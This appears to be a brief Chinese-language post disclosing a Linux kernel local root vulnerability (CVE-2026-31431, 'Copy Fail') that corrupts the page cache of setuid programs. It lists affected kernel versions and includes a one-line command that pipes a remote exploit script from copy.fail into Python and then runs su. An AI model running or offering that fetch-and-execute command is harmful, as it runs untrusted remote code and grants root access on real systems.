Linux 惊现史诗级提权漏洞 Copy Fail(CVE-2026-31431)
该漏洞允许本地普通用户向任意可读文件的 page cache(页缓存) 中写入4个受控字节,从而篡改 setuid 程序(如 /usr/bin/su)获得 root 权限。其利用过程无需竞争条件,一个仅 732 字节的 Python 脚本就能在所有受影响系统上稳定提权影响范围非常广泛:自 2017 年以来几乎所有主流 Linux 发行版的高危本地提权漏洞(内核版本号 ≥ 4.14 且 < 6.18.22、6.19.12、7.0 等修复版本)。curl https://copy.fail/exp | python3 && su
详细内容参考:https://copy.fail/